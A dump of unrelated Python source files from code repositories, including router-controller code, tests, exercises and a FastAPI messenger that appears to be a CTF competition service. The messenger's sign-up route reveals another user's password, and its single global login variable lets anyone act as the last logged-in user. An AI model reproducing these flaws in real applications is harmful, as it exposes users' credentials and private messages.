%H:%M:%S')\n}\n\n\ndef test_add_user(service_user):\n service_user.add_user(**data_user)\n service_user.user_repo.add_instance.assert_called_once()\n\n\ndef test_get_user(service_user, user_repo):\n user = service_user.get_info(id=1)\n assert asdict(user) == data_user\n\n\ndef test_add_chat(service_chat):\n service_chat.add_chat(**data_chat)\n service_chat.chat_repo.add_instance.assert_called_once()\n\n\ndef test_update_chat(service_chat):\n new_chat = service_chat.update_chat(**data_chat_update)\n assert asdict(new_chat) == data_chat_update\n\n\ndef test_get_chat(service_chat):\n chat = service_chat.get_info(chat_id=1, user_id=1)\n assert asdict(chat) == data_chat\n\n\ndef test_add_chat_user(service_chat):\n service_chat.add_user(**data_chat_user)\n service_chat.chat_members_repo.add_instance.assert_called_once()\n\n\ndef test_add_chat_msg(service_chat):\n service_chat.send_massage(**data_chat_msg)\n service_chat.chat_messages_repo.send_message.assert_called_once()\n\n\ndef test_delete_chat(service_chat):\n service_chat.delete_chat(chat_id=1, user_id=1)\n service_chat.chat_repo.delete_instance.assert_called_once()\n\n\ndef test_leave(service_chat):\n service_chat.leave_chat(chat_id=1, user_id=1)\n service_chat.chat_repo.delete_instance.assert_called_once()\n\n\ndef test_get_chat_user(service_chat):\n members = service_chat.get_users(chat_id=1, user_id=1)\n assert asdict(members[0]) == data_chat_user\n\n\ndef test_get_chat_msg(service_chat):\n messages = service_chat.get_message(chat_id=1, user_id=1)\n assert asdict(messages) == data_chat_msg\n","repo_name":"AlexandrovDaniil/evraz_project1","sub_path":"components/chat_backend/tests/unit/application/services/test_chat.py","file_name":"test_chat.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42319780787","text":"from threading import Thread, Event\nfrom scapy.all import sendp\nfrom scapy.all import Packet, Ether, IP, ARP, ICMP\nfrom async_sniff import sniff\nfrom packet_datatypes import CPUMetadata, Hello, LSU, LSUAd, PWOSPF\nimport time\nimport collections\n\nARP_OP_REQ = 0x0001\nARP_OP_REPLY = 0x0002\nALLRoutersAreaID = '224.0.0.5'\nLSU_INT = 5\nPWOSPF_PROT_NUM = 89\nPWOSPF_HELLO_TYPE = 1\nPWOSPF_LSU_TYPE = 4\nstart_wait=0.3\n\nclass MacLearningController(Thread):\n def __init__(self, sw, macAddr, routerID, hello_int, lsu_int):\n super(MacLearningController, self).__init__()\n self.sw = sw\n self.start_wait = start_wait # time to wait for the controller to be listenning\n self.iface = sw.intfs[1].name\n self.port_for_mac = {}\n self.stop_event = Event()\n self.mac_for_ip = {}\n self.mac_for_ip_times = {}\n self.macAddr = macAddr\n\n self.adj_list = []\n self.adj_list_timeout = []\n self.last_packets = []\n\n self.routerID = routerID\n self.areaID = ALLRoutersAreaID\n self.helloint = hello_int\n self.lsuint = lsu_int\n self.seq_num_lsu = 0\n\n self.sending_hello_thread = Periodic_Hello_Sender(routing_controller=self)\n self.sending_lsu_thread = Periodic_LSU_Sender(routing_controller=self)\n\n def addMacAddr(self, mac, port):\n # Don't re-add the mac-port mapping if we already have it:\n if mac in self.port_for_mac: return\n\n self.sw.insertTableEntry(table_name='MyIngress.fwd_l2',\n match_fields={'hdr.ethernet.dstAddr': [mac]},\n action_name='MyIngress.set_egr',\n action_params={'port': port})\n self.port_for_mac[mac] = port\n \n def addIPAddr(self, ip, mac):\n # Don't re-add the ip-mac mapping if we already have it:\n if ip in self.mac_for_ip: return\n\n self.sw.insertTableEntry(table_name='MyIngress.arp_table',\n match_fields={'next_ip_addr': [ip]},\n action_name='MyIngress.match_arp_addr',\n action_params={'next_mac': mac})\n self.mac_for_ip[ip] = mac\n # self.mac_for_ip_times[ip] = time.time()\n\n def handleArpReply(self, pkt):\n self.addMacAddr(pkt[ARP].hwsrc, pkt[CPUMetadata].srcPort)\n # print(\"ARP reply from %s\" % pkt[ARP].psrc)\n # print(\"hwsrc: %s\" % pkt[ARP].hwsrc)\n\n self.addIPAddr(pkt[ARP].psrc, pkt[ARP].hwsrc)\n self.send(pkt)\n \n def generate_arp_reply(self, pkt):\n if pkt[ARP].pdst == (self.routerID + '0'):\n ip_dest = pkt[ARP].pdst\n pkt[Ether].dst = pkt[Ether].src\n pkt[Ether].src = self.macAddr\n pkt[ARP].op = ARP_OP_REPLY\n pkt[ARP].pdst = pkt[ARP].psrc\n pkt[ARP].psrc = ip_dest\n pkt[ARP].hwdst = pkt[ARP].hwsrc\n pkt[ARP].hwsrc = self.macAddr\n return pkt\n \n\n def handleArpRequest(self, pkt):\n self.addMacAddr(pkt[ARP].hwsrc, pkt[CPUMetadata].srcPort)\n # print(\"ARP request from %s\" % pkt[ARP].psrc)\n # print(\"hwsrc: %s\" % pkt[ARP].hwsrc)\n \n self.addIPAddr(pkt[ARP].psrc, pkt[ARP].hwsrc)\n\n pkt = self.generate_arp_reply(pkt)\n\n self.send(pkt)\n\n def floodLSUPkt(self, pkt):\n newTTL = pkt[LSU].ttl - 1\n if newTTL > 0:\n for n in self.adj_list[self.routerID][0]:\n newPkt = pkt\n key_mac = self.mac_for_ip[n]\n key_port = self.port_for_mac[key_mac]\n newPkt[CPUMetadata].dstPort = key_port\n newPkt[IP].dst = n\n newPkt[LSU].ttl = newTTL\n if newPkt[IP].dst != newPkt[IP].src:\n self.send(newPkt)\n\n def generate_router_datatype(self, routerID):\n return (routerID, ALLRoutersAreaID, LSU_INT)\n\n def compute_shortest_path(self):\n visited = set()\n visited.add(self.routerID)\n path = {}\n queue = collections.deque([])\n for routerId in self.adj_list[self.routerID][0]:\n path[routerId] = routerId\n visited.add(routerId)\n queue.append(routerId)\n \n while(queue):\n curr_routerID = queue.popleft()\n curr_best_path = path[curr_routerID]\n for neighbor_routerID in self.adj_list[curr_routerID][0]:\n if(neighbor_routerID not in visited):\n visited.add(neighbor_routerID)\n path[neighbor_routerID] = curr_best_path\n queue.append(neighbor_routerID)\n return path\n \n def update_table(self, path):\n for key in path.keys():\n print(\"key: %s\\n\" % key)\n key_mac = self.mac_for_ip[path[key]]\n key_port = self.port_for_mac[key_mac]\n\n self.sw.insertTableEntry(table_name = 'MyIngress.routing_table',\n match_fields = {'hdr.ipv4.dstAddr': path[key]},\n action_name = 'MyIngress.forwarding_path',\n action_params = {'next': path[key], 'port': key_port})\n\n def handlePkt(self, pkt):\n #pkt.show2()\n assert CPUMetadata in pkt, \"Should only receive packets from switch with special header\"\n\n # Ignore packets that the CPU sends:\n if pkt[CPUMetadata].fromCpu == 1: return\n\n if ARP in pkt:\n if pkt[ARP].op == ARP_OP_REQ:\n self.handleArpRequest(pkt)\n elif pkt[ARP].op == ARP_OP_REPLY:\n self.handleArpReply(pkt)\n \n if ICMP in pkt:\n # to do handle ICMP packet\n return\n \n if IP in pkt:\n # to do handle IP packet\n # if pkt dest not in intfs and dest is not for hello then icmp unreachable\n return \n\n if PWOSPF in pkt:\n if pkt[PWOSPF].version != 2:\n return\n \n routerID = pkt[IP].src\n if pkt[PWOSPF].type == 1 and Hello in pkt:\n # if router has neighbor already, update timeout\n if routerID not in self.adj_list:\n # else add neighbor to list\n new_router = self.generate_router_datatype(routerID)\n curr_router = self.generate_router_datatype(self.routerID)\n self.adj_list[routerID].append(curr_router)\n self.adj_list[self.routerID].append(new_router)\n\n self.adj_list_timeout[routerID] = time.time()\n \n if pkt[PWOSPF].type == 4 and LSU in pkt:\n # If the LSU was originally generated by the incoming router, the packet is dropped\n if self.routerID == routerID:\n return\n\n if routerID in self.last_packets:\n last_pkt_received = self.last_packets[routerID]\n if last_pkt_received[LSU].seq == pkt[LSU].seq:\n return\n \n self.last_packets[routerID] = pkt\n\n # update database\n for LSUAd in pkt[LSU].ads:\n ad_routerID = LSUAd.routerID\n if ad_routerID not in self.adj_list:\n self.adj_list[ad_routerID] = []\n \n ad_router_datatype = self.generate_router_datatype(ad_routerID)\n curr_router_datatype = self.generate_router_datatype(self.routerID)\n\n if ad_router_datatype not in self.adj_list[routerID]:\n self.adj_list[routerID].append(self.generate_router_datatype(ad_routerID))\n if curr_router_datatype not in self.adj_list[ad_routerID]:\n self.adj_list[ad_routerID].append(self.generate_router_datatype(routerID))\n \n # recompute shortest paths\n shortest_paths = self.compute_shortest_paths()\n self.update_table(shortest_paths)\n \n # flood packets\n self.floodLSUPkt(pkt)\n\n def send(self, *args, **override_kwargs):\n pkt = args[0]\n assert CPUMetadata in pkt, \"Controller must send packets with special header\"\n pkt[CPUMetadata].fromCpu = 1\n kwargs = dict(iface=self.iface, verbose=False)\n kwargs.update(override_kwargs)\n sendp(*args, **kwargs)\n\n def run(self):\n sniff(iface=self.iface, prn=self.handlePkt, stop_event=self.stop_event)\n\n def start(self, *args, **kwargs):\n super(MacLearningController, self).start(*args, **kwargs)\n\n # add monolith ARP, LSU, Hello Packet Managers\n # call .start()\n # self.sending_hello_thread.start()\n # self.sending_lsu_thread.start()\n\n time.sleep(self.start_wait)\n\n def join(self, *args, **kwargs):\n self.stop_event.set()\n super(MacLearningController, self).join(*args, **kwargs)\n\nclass Periodic_Hello_Sender(Thread):\n def __init__(self, routing_controller):\n super(Periodic_Hello_Sender, self).__init__()\n self.sender_ctrl = routing_controller\n\n def run(self):\n for i in range(5): # for each port \n if i != 4:\n port = i\n pkt = Ether()/CPUMetadata()/IP()/PWOSPF()/Hello()\n pkt[Ether].src = self.sender_ctrl.macAddr\n pkt[Ether].dst = \"ff:ff:ff:ff:ff:ff\"\n pkt[CPUMetadata].fromCpu = 1\n pkt[CPUMetadata].origEtherType = 0x0800\n pkt[CPUMetadata].srcPort = 1\n pkt[CPUMetadata].dstPort = port\n pkt[IP].src = self.sender_ctrl.routerID\n pkt[IP].dst = \"224.0.0.5\"\n pkt[IP].proto = PWOSPF_PROT_NUM\n pkt[PWOSPF].version = 2\n pkt[PWOSPF].type = PWOSPF_HELLO_TYPE\n pkt[PWOSPF].length = 0\n pkt[PWOSPF].routerID = self.sender_ctrl.routerID\n pkt[PWOSPF].areaID = self.sender_ctrl.areaID\n pkt[PWOSPF].checksum = 0\n pkt[Hello].netmask = 0\n pkt[Hello].helloint = self.sender_ctrl.helloint\n\n self.sender_ctrl.send(pkt)\n\n time.sleep(self.sender_ctrl.helloint)\n\nclass Periodic_LSU_Sender(Thread):\n def __init__(self, routing_controller):\n super(Periodic_LSU_Sender, self).__init__()\n self.sending_ctrl = routing_controller\n\n def run(self):\n adList = []\n for n in self.sending_ctrl.adj_list:\n pkt = LSUAd()\n pkt[LSUAd].subnet = 0\n pkt[LSUAd].mask = 0\n pkt[LSUAd].routerID = n[0]\n adList.append(pkt)\n\n # Send LSU packet\n pkt = Ether()/CPUMetadata()/IP()/PWOSPF()/LSU()\n pkt[Ether].src = self.sending_ctrl.macAddr\n pkt[Ether].dst = \"ff:ff:ff:ff:ff:ff\"\n pkt[CPUMetadata].fromCpu = 1\n pkt[CPUMetadata].origEtherType = 0x0800\n pkt[CPUMetadata].srcPort = 1\n pkt[IP].src = self.sending_ctrl.routerID\n pkt[IP].proto = PWOSPF_PROT_NUM\n pkt[PWOSPF].version = 2\n pkt[PWOSPF].type = PWOSPF_LSU_TYPE\n pkt[PWOSPF].length = 0\n pkt[PWOSPF].routerID = self.sending_ctrl.routerID\n pkt[PWOSPF].areaID = self.sending_ctrl.areaID\n pkt[PWOSPF].checksum = 0\n pkt[LSU].sequence = self.sending_ctrl.seq_num_lsu\n pkt[LSU].ttl = 64\n pkt[LSU].numAds = len(adList)\n pkt[LSU].adList = adList\n\n self.sending_ctrl.seq_num_lsu = self.sending_ctrl.seq_num_lsu + 1\n self.sending_ctrl.floodLSUPkt(pkt)\n\n time.sleep(self.sending_ctrl.lsuint)\n","repo_name":"dylanfernandezdelara/p4_router_cpsc435","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39727438477","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: wxnacy(wxnacy@gmail.com)\n\"\"\"\nfor github\n\"\"\"\nimport requests\n\nfrom wapi import Wapi\n\nfrom goss.git import Git\nfrom goss.common import constants\n\nproxies = {\n \"http\": \"http://127.0.0.1:7890\",\n \"https\": \"http://127.0.0.1:7890\",\n}\n\nclass Github(Git):\n domain = 'api.github.com'\n\n def __init__(self, owner, repo=None, *args, **kwargs):\n self._owner = owner\n self._repo = repo\n self.www_wapi = Wapi(module_name = 'www_github',\n config_root=constants.WAPI_CONFIG_ROOT)\n self.api_wapi = Wapi(module_name = 'api_github',\n config_root=constants.WAPI_CONFIG_ROOT)\n self.api_wapi.config.get_env().add( owner=self._owner )\n\n def repo_profile(self, repo=None):\n if repo:\n self._repo = repo\n self.api_wapi.config.get_env().add( repo=self._repo )\n return self.api_wapi.request('repo_profile')\n\n def repo_content(self, repo, path):\n if repo:\n self._repo = repo\n self.api_wapi.config.get_env().add(\n repo=self._repo,\n path = path)\n return self.api_wapi.request('repo_content')\n\nif __name__ == \"__main__\":\n g = Github('wxnacy')\n # res = g.repo_profile('goss')\n res = g.repo_content('book', '2014.md')\n import json\n print(json.dumps(res.json(), indent=4))\n\n","repo_name":"wxnacy/goss","sub_path":"goss/git/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11193844481","text":"from sys import stdin as s\n\n\ns = open('input.txt', 'rt')\n\na,b,c = map(int,s.readlines())\n\n# result = int(a*b*c)\n# temp = [0,0,0,0,0,0,0,0,0,0]\n# while result > 10 :\n# temp[int(result%10)] += 1\n# result /= 10\n# result = int(result)\n\n# temp[result] +=1\n\n\n# for i in temp:\n# print(i)\n\n\nresult = a*b*c\n\nfor i in range(10):\n print(str(result).count(str(i)))\n\n\n\n\n\n\n","repo_name":"wnstn819/AlgoTrip","sub_path":"pythonSt/Week01/기본(기초, 수학, 재귀, 정렬, 완전탐색)/B2_2577_숫자의 개수.py","file_name":"B2_2577_숫자의 개수.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42231382002","text":"import re\r\ncount = 0\r\nregex = r'^([1-8][0-9]|90)\\..*(GET|POST).*(200).*'\r\nwith open('access.log.txt', \"r\") as file:\r\n data = file.readlines()\r\n for a in data:\r\n if(re.match(regex, a)):\r\n x = re.search(regex, a)\r\n print(x.group())\r\n count = count+1\r\n print(count)","repo_name":"NazarHladysh/Lab12","sub_path":"Lab12.py","file_name":"Lab12.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5608635180","text":"from django import forms \nfrom django.contrib.auth.forms import UserCreationForm \nfrom django.contrib.auth.models import User \nfrom .models import Work\n\nclass SignupForm(UserCreationForm): \n email = forms.EmailField(max_length=200, help_text='Required') \n class Meta: \n model = User \n fields = ('username', 'email', 'password1', 'password2') \n\nclass WorkForm(forms.ModelForm):\n price = forms.IntegerField(min_value=1000,max_value=50000)\n def clean(self):\n price = self.cleaned_data['price']\n time = self.cleaned_data['time']\n if time < 3 and price > 30000:\n raise forms.ValidationError('حداکثر قیمت کار‌های با زمان ۳ روز ۳۰۰۰۰ تومان می باشد')\n class Meta:\n model = Work\n fields = ('work_title', 'price', 'time', 'info')\n widgets = {\n 'work_title' : forms.Textarea(attrs={'cols': 80, 'rows': 1}),\n 'info' : forms.Textarea(attrs={'cols': 80, 'rows': 10}),\n }\n","repo_name":"MHN1401/git","sub_path":"page/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2217134358","text":"import sys\nfrom cachesim import CacheSimulator, Cache, MainMemory\n\ndef get_set_id(cache, addr):\n return (addr >> cache.cl_bits) % cache.sets\n\nfilename = sys.argv[1]\nN = sys.argv[2]\nmem = MainMemory()\n\n# Cascade Lake\nl3 = Cache(\"L3\", 14336, 16, 64, \"LRU\", write_allocate=False)\nl2 = Cache(\"L2\", 1024, 16, 64, \"LRU\", store_to=l3, victims_to=l3)\nl1 = Cache(\"L1\", 64, 8, 64, \"LRU\", store_to=l2, load_from=l2)\nmem.load_to(l2)\nmem.store_from(l3)\ncs = CacheSimulator(l1, mem)\n\nsets_hist = {\n 'l1': {s: 0 for s in range(l1.sets)},\n 'l2': {s: 0 for s in range(l2.sets)},\n 'l3': {s: 0 for s in range(l3.sets)}\n}\n\nwith open(filename, 'r') as fp:\n for line in fp.readlines():\n op, addr = line.split(\": \")\n op = op[0]\n addr = int(addr, 16)\n sets_hist['l1'][get_set_id(l1, addr)] += 1\n sets_hist['l2'][get_set_id(l2, addr)] += 1\n sets_hist['l3'][get_set_id(l3, addr)] += 1\n\nfor cache_level, data in sets_hist.items():\n if cache_level != 'l3':\n print(cache_level, \": \")\n for set_id in data:\n if data[set_id] > 0:\n print(set_id, \" -> \", data[set_id])\n","repo_name":"RRZE-HPC/MD-Bench","sub_path":"util/cache_sets_histogram.py","file_name":"cache_sets_histogram.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11110879541","text":"import os, pandas\nimport numpy as np\nimport pandas as pd\n# import plotly\n\nsymbols = ['3DA_AX']\n\nfor filename in os.listdir('datasets'):\n symbol = filename.split(\".\")[0]\n # print(symbol)\n df = pandas.read_csv('datasets/{}'.format(filename))\n # print(df)\n \n# error handling for empty dataframes\n if df.empty:\n continue\n \n#21SMA\n\ndf['EMA_21'] = df['Close'].ewm(span=20, adjust=False).mean()\ndf['EMA_5'] = df['Close'].ewm(span=50, adjust=False).mean()\n# Date,Open,High,Low,Close,Volume,Dividends,Stock Splits\n\n# ATR calculation\nhigh_low = df['High'] - df['Low']\nhigh_close = np.abs(df['High'] - df['Close'].shift())\nlow_close = np.abs(df['Low'] - df['Close'].shift())\nranges = pd.concat([high_low, high_close, low_close], axis=1)\ntrue_range = np.max(ranges, axis=1)\ndf['ATR'] = true_range.rolling(50).sum()/50\n\nprint(df)","repo_name":"Jimmybubbles/finance_algos","sub_path":"squeeze.py","file_name":"squeeze.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17201243940","text":"from fastapi import FastAPI, Request, Form, APIRouter, APIRouter\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import RedirectResponse\nfrom starlette.templating import Jinja2Templates\nfrom fastapi.encoders import jsonable_encoder\nfrom config import SQLALCHEMY_DATABASE_URL\nimport crud\nimport schemas\nimport databases\n\nactive_login = None\n\nclass UnicornException(Exception):\n def __init__(self, content: str, code_status: int):\n self.content = content\n self.status = code_status\n\napp = FastAPI()\n\napp.mount('/shape/static/css', StaticFiles(directory=\"/usr/src/app/shape/static/css\"), name=\"styles\")\napp.mount('/shape/static/js', StaticFiles(directory=\"/usr/src/app/shape/static/js\"), name=\"js\")\napp.mount('/shape/static/imgs', StaticFiles(directory=\"/usr/src/app/shape/static/imgs\"), name=\"im\")\ntemp = Jinja2Templates(directory=\"/usr/src/app/shape/\")\n\nuser_router = APIRouter(\n prefix=\"/api/user\",\n tags=[\"user\"],\n responses={404: {\"description\": \" Not found :(\"}},\n)\n\n@app.exception_handler(UnicornException)\nasync def unicorn_exception_handler(request: Request, exc: UnicornException):\n \"\"\" Обработчик ошибок типа UnicornException \"\"\"\n return temp.TemplateResponse(\"info.html\", {\"request\": request,\n \"status\": exc.status,\n \"message\": f\"Oops! {exc.content}\",\n })\n\ndatabase = databases.Database(SQLALCHEMY_DATABASE_URL)\n\n@app.get(\"/\")\nasync def mainPage(request: Request):\n if active_login:\n return temp.TemplateResponse(\"index.html\", {\"request\": request, \"isAutorized\":active_login})\n else:\n return temp.TemplateResponse(\"index.html\", {\"request\": request})\n\n@user_router.get(\"/sign-up\")\nasync def signUpGet(request: Request):\n return temp.TemplateResponse(\"signup.html\", {\"request\": request})\n\n@user_router.post(\"/sign-up\")\nasync def signUp(request: Request, login: str = Form(...), passwrd: str = Form(...)):\n \n if_already_registered = await crud.already_registered(database, login)\n \n if if_already_registered:\n return await unicorn_exception_handler(request,\n UnicornException(\"This user already registered, him pass: \"+str(if_already_registered), 400))\n else:\n instance = schemas.UserCreate(login=login, password=passwrd)\n result = await crud.create_user(database, instance)\n return temp.TemplateResponse(\"tmp.html\", {\"request\": request, \"user_data\": result})\n\n@user_router.get(\"/sign-in\")\nasync def signInGet(request: Request):\n return temp.TemplateResponse(\"signin.html\", {\"request\": request})\n\n@user_router.post(\"/sign-in\")\nasync def signIn(request: Request, login: str = Form(...), password: str = Form(...)):\n global active_login\n cuser = schemas.UserCreate(login=login, password=password)\n if_active = await crud.check_current_user(database, cuser)\n\n if isinstance(if_active, dict):\n return await unicorn_exception_handler(request, UnicornException(\"No such user\", 404))\n\n if not if_active:\n active_login = login\n await crud.activate_user(database, cuser)\n \n active_login = login\n return await mainPage(request)\n\ndef deactivateLogin():\n global active_login\n active_login = None\n\n@user_router.get(\"/log-out\", response_model=schemas.UserBase, response_model_exclude_unset=True)\nasync def logOut(request: Request):\n if not active_login:\n return await unicorn_exception_handler(request, UnicornException(\"Exit error\", 400))\n\n response = await crud.deactivate_user(database, active_login)\n deactivateLogin()\n print(jsonable_encoder(response))\n return RedirectResponse(\"/\")\n\n@user_router.get(\"/sign-in/messages\")\nasync def getMessenges(request: Request):\n print(active_login)\n incoming_messages = await crud.all_incoming_messages(database, active_login)\n\n if isinstance(incoming_messages, str):\n return temp.TemplateResponse(\"messages.html\", {\"request\": request, \"isAutorized\":active_login, \n \"length\":0})\n elif not incoming_messages:\n return await unicorn_exception_handler(request, UnicornException(\"You are not authorized!\", 400))\n else:\n return temp.TemplateResponse(\"messages.html\", {\"request\": request, \"isAutorized\":active_login, \n \"messages\": incoming_messages, \"length\": len(incoming_messages)})\n\n\n@user_router.post(\"/sign-in/messages\", response_model=schemas.SendedBase, response_model_exclude_unset=True)\nasync def sendMessage(request: Request, recipientName: str = Form(...), message: str = Form(...)):\n returned = await crud.send_message(database, active_login, recipientName, message)\n if not returned:\n return await unicorn_exception_handler(request, UnicornException(\"No such recipient or sender\", 404))\n else:\n return returned\n\n@user_router.get(\"/sign-in/messages/all-users\")\nasync def getAllUsers(request: Request):\n print(active_login)\n all_users = await crud.all_users_db(database, active_login)\n\n if not all_users:\n return await unicorn_exception_handler(request, UnicornException(\"You are not authorized!\", 400))\n\n return temp.TemplateResponse(\"index.html\", {\"request\": request, \"isAutorized\":active_login, \n \"users\": all_users, \"length\": len(all_users)})\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\napp.include_router(user_router)\n","repo_name":"n57uctf/yetictf-2022-finals","sub_path":"M3SS3NG3R/m3ss3ng3r/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26597443633","text":"\"\"\"Models for Blogly.\"\"\"\nfrom flask_sqlalchemy import SQLAlchemy \nimport datetime\n\ndb = SQLAlchemy()\n\n\ndef connect_db(app):\n \"\"\"Connect to database.\"\"\"\n\n db.app = app\n db.init_app(app)\n\n\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer,\n primary_key = True,\n autoincrement = True)\n first_name = db.Column(db.String(25),\n nullable = False)\n last_name = db.Column(db.String(50),\n nullable = False)\n image_url = db.Column(db.String)\n posts = db.relationship('Posts', backref='user', cascade='all, delete-orphan')\n #use the cascade='all, delete-orphan') basically says if this user is deleted we delete all of them\n #middleman table\n\n\n def __repr__(self):\n return f\"\"\n\n\nclass Posts(db.Model):\n __tablename__ = \"posts\"\n id = db.Column(db.Integer,\n primary_key = True,\n autoincrement = True)\n title = db.Column(db.String(), \n nullable = False)\n content = db.Column(db.String(),\n nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # post_tag_post = db.relationship('PostTag', backref='posts_to_tag')\n tags = db.relationship('Tag', secondary='post_tag', back_populates='posts')\n\n# class Tag(db.Model):\n# __tablename__ = \"tags\"\n# id = db.Column(db.Integer,\n# primary_key = True,\n# autoincrement = True)\n# tags = db.Column(db.String(),\n# nullable = False )\n\n# post_tag = db.relationship('PostTag', backref='tags_for_posts')\nclass Tag(db.Model):\n __tablename__ = \"tags\"\n id = db.Column(db.Integer,\n primary_key=True,\n autoincrement=True)\n tags = db.Column(db.String(),\n nullable=False)\n\n # post_tag_tag = db.relationship('PostTag', secondary='post_tag', backref='tags')\n posts = db.relationship('Posts', secondary='post_tag', back_populates='tags')\n\nclass PostTag(db.Model):\n __tablename__ = 'post_tag'\n tags_id = db.Column(db.Integer, db.ForeignKey('tags.id'), primary_key = True)\n\n posts_id = db.Column(db.Integer, db.ForeignKey('posts.id'), primary_key=True)\n #We put 2 primary keys together to say those 2 things together are primary key for PostTag\n\n\n# def get_directory_join():\n# directory = db.session.query(Employee.name, Department.dept_name, Department.phone).join(Department).all()\n# for name, dept, phone in drectory:\n# print(name, dept, phone)\n\n\ndef connect_db(app):\n db.app = app\n db.init_app(app)","repo_name":"santosgonz/biogly","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19497169739","text":"import sys\r\nn = int(input())\r\nstack = []\r\nstack_reverse = []\r\nwhile n > 0:\r\n comand = input().split()\r\n n -= 1\r\n\r\n if comand[0] == \"1\":\r\n if int(comand[1]) <= 109:\r\n stack.append(comand[1])\r\n\r\n elif comand[0] == \"2\":\r\n if len(stack) > 0:\r\n stack.pop()\r\n else:\r\n continue\r\n\r\n elif comand[0] == \"3\":\r\n if len(stack) > 0:\r\n print(max(stack))\r\n\r\n elif comand[0] == \"4\":\r\n if len(stack):\r\n print(min(stack))\r\n\r\nif n == 0:\r\n while len(stack):\r\n stack_reverse.append(stack.pop())\r\nprint(\", \".join(stack_reverse))","repo_name":"Georgi552/Pyton_Advanced_Softuni","sub_path":"2. Maximum and Minimum Element Exersise 50%.py","file_name":"2. Maximum and Minimum Element Exersise 50%.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24660971816","text":"from flask import g\r\nfrom . import database as db\r\nfrom OBlog import app\r\nfrom .blueprint.posts.main import getPostForShow\r\nfrom .blueprint.admin.main import getSiteConfigDict\r\nimport re\r\n\r\ndef getSite():\r\n if not hasattr(g, 'getSite'):\r\n res = getSiteConfigDict()\r\n from .blueprint.pages.main import getPagesDict\r\n res['pages'] = getPagesDict()\r\n from .blueprint.friends.main import getFriends\r\n res['friends'] = getFriends()\r\n g.getSite = res\r\n \r\n rooturl = res['rooturl']['value']\r\n if not rooturl: # 未填写相应项\r\n rooturl = \"/\"\r\n res[\"rooturl\"][\"value\"] = rooturl + '/' if rooturl[-1] != '/' else rooturl\r\n return g.getSite\r\n\r\ndef getRoot():\r\n return getSite()['rooturl']['value']\r\n\r\n\r\ndef viewpath(ip, addr):\r\n prefix = addr[0:5]\r\n if prefix != \"/stati\" and prefix != \"/api/\" and prefix != \"/admi\":\r\n #if addr not in session:\r\n #session[addr] = True\r\n view = getSiteConfigDict()\r\n view = str(int(view['view']['value']) + 1)\r\n db.commit_db(r\"update siteConfig set value='%s' where sid='view'\" % view)\r\n\r\n match = re.match(r'^/post/(.*?)/$', addr)\r\n if match != None:\r\n url = match.group(1)\r\n post = getPostForShow(url)\r\n if post != None:\r\n view = str(int(post['view']) + 1)\r\n db.commit_db(\"update posts set view='%s' where url='%s'\" % (view, url))\r\n","repo_name":"OhYee/OBlog","sub_path":"OBlog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"23084876606","text":"from selenium import webdriver\nfrom .yadi_disk_api import API\nfrom .pages.login_page import LoginPage\nimport urllib.parse\nimport pytest\nimport time\n\n\ndef pytest_addoption(parser):\n parser.addoption('--browser_name', action='store', default=\"chrome\",\n help=\"Choose browser: chrome or firefox\")\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n browser_name = request.config.getoption(\"browser_name\")\n browser = None\n if browser_name == \"chrome\":\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome()\n elif browser_name == \"firefox\":\n print(\"\\nstart firefox browser for test..\")\n browser = webdriver.Firefox()\n else:\n raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef setup(browser):\n link = \"https://disk.yandex.ru/client\"\n login_page = LoginPage(browser, link)\n login_page.open()\n login = \"your login\"\n password = \"your password\"\n login_page.login_user(login, password)\n time.sleep(1)\n # Пришлось добавить ожидание для того что бы можно было открыть другую страницу.\n # Без него страница логина не успевает до конца загрузиться.\n\n\n@pytest.fixture(scope=\"function\", params=[\"QA%2FQA2\"])\ndef new_folder(request):\n disk = API()\n end_name = 0\n beginning_name = 0\n path_to_folder = request.param\n true_path = urllib.parse.unquote(path_to_folder)\n\n for i in true_path:\n end_name += 1\n if i == \"/\":\n disk.create_folder(path_to_folder[0:end_name-1])\n end_name += 2\n 